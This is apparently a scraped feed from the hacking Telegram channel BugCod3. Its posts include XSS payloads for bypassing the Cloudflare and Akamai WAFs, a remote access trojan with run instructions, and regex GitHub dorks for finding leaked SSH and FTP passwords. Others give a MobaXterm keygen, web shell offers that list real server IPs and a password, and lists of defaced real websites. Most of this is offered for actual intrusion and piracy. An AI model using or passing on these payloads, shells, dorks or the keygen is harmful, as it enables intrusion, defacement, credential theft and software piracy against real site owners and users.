Cloudflare bypass XSS payloads
Tested On:👩💻
XSS Payloads:
#Exploit #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tested On:
XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">#Exploit #XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡2❤2
New xss payload to bypass cloudflare WAF
#XSS #Payload #Bypass #CF #WAF
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#XSS #Payload #Bypass #CF #WAF
Please open Telegram to view this post
VIEW IN TELEGRAM
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.
go install -v github.com/hakluke/haktrails@latest
Gather subdomains
cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains
and...
BugCod3#Go #Subdomain #IP #Discovery
Please open Telegram to view this post
VIEW IN TELEGRAM
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.
Method 1:
pip install git+https://github.com/sanjai-AK47/Subprober.git
Method 2:
cd Subprober
pip install .
subprober -f subdomains.txt -o output.txt -tl -wc -sv -apt -wc -ex 500 -v -o output.txt -c 20
BugCod3#Subdomains #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2 2⚡1👍1
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015
BugCod3#Rat #Malware #Remote #Access
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡1❤1
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.
go install github.com/hakluke/hakip2host@latest
hakip2host --help
BugCod3#Osint #Recon #CIDR #HTTPS
Please open Telegram to view this post
VIEW IN TELEGRAM
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
BugCod3#Bypass #Login #Page #Authentication
Please open Telegram to view this post
VIEW IN TELEGRAM
I don't know how to make custom settings take effect in
Customizer mode directly.The only way I found is that you should export custom settings to a file named
MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path../MobaXterm.exe -customizer
./MobaXterm-Keygen.py "DoubleSine" 10.9
BugCod3#Python #MobaXterm #Keygen #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!
Eg, find SSH and FTP passwords via connection strings with:
#infosec #cybersecurite #bugbountytip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ #infosec #cybersecurite #bugbountytip
Please open Telegram to view this post
VIEW IN TELEGRAM
LEAKEY is a bash noscript which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The noscript is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.
LEAKEY uses a json based signature file located at
~/.leakey/signatures.jsonThe idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.
LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the
signatures.json filecurl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh
After running the installation command, simply run the below in your terminal
leaky
All the checks for LEAKEY are defined in the
signatures.json file.To add any new checks, simply appened the signatures file at
~/.leakey/signatures.json{
"id": 0,
"name": "Slack API Token",
"args": [
"token"
],
"command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
}BugCod3#RedTeam #BugHunter #Leaked #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2 2⚡1
PHP: 7.0.33
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤🔥1🔥1
https://fnsir.ru/
https://dzhakkolo.fnsir.ru/index.html
https://kerling.fnsir.ru/index.html
https://kornhol.fnsir.ru/index.html
https://krokinol.fnsir.ru/index.html
https://novus.fnsir.ru/index.html
https://shafflbord.fnsir.ru/index.html
https://worldnovuss.com/index.html
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥2⚡1🔥1
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
PHP: 8.2.15
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤🔥1🔥1😢1
Bypass Cloudflare WAF (XSS without parentheses)
#xss #bugbountytips #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
javanoscript:var{a:onerror}={a:alert};throw%20document.domain#xss #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
Akamai WAF (new, requires a click to pop)
Vector PoC
#XSS #Bypass
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
Vector PoC
#XSS #Bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
The useful exploit finder
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
pip install -r requirements.txt
python sicat.py --help
From keyword:
python sicat -k telerik --exploitdb --msfmodule
From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm
BugCod3#Exploit #Metasploit #Finder
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1🔥1🐳1